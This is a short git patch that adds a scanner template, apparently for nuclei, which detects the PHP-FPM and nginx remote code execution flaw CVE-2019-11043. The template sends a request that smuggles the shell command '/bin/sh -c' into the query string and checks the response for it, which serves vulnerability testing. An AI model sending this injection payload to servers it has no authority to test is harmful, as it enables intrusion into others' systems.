From b773cc9f0fe608d6aa97ccc4bd69cfbbdb00868d Mon Sep 17 00:00:00 2001
From: Geeknik Labs <466878+geeknik@users.noreply.github.com>
Date: Fri, 4 Sep 2020 22:28:41 +0000
Subject: [PATCH] Create CVE-2019-11043.yaml

PHP-FPM & nginx RCE (CVE-2019-11043)
---
 cves/CVE-2019-11043.yaml | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)
 create mode 100644 cves/CVE-2019-11043.yaml

diff --git a/cves/CVE-2019-11043.yaml b/cves/CVE-2019-11043.yaml
new file mode 100644
index 0000000000..cd9493ce7a
--- /dev/null
+++ b/cves/CVE-2019-11043.yaml
@@ -0,0 +1,18 @@
+id: CVE-2019-11043
+
+info:
+  name: PHP-FPM & nginx RCE
+  author: geeknik
+  severity: high
+  description: https://github.com/neex/phuip-fpizdam
+  
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?a=/bin/sh+-c+'which+which'&"
+
+    matchers:
+      - type: word
+        words:
+          - "/bin/which"
+        part: body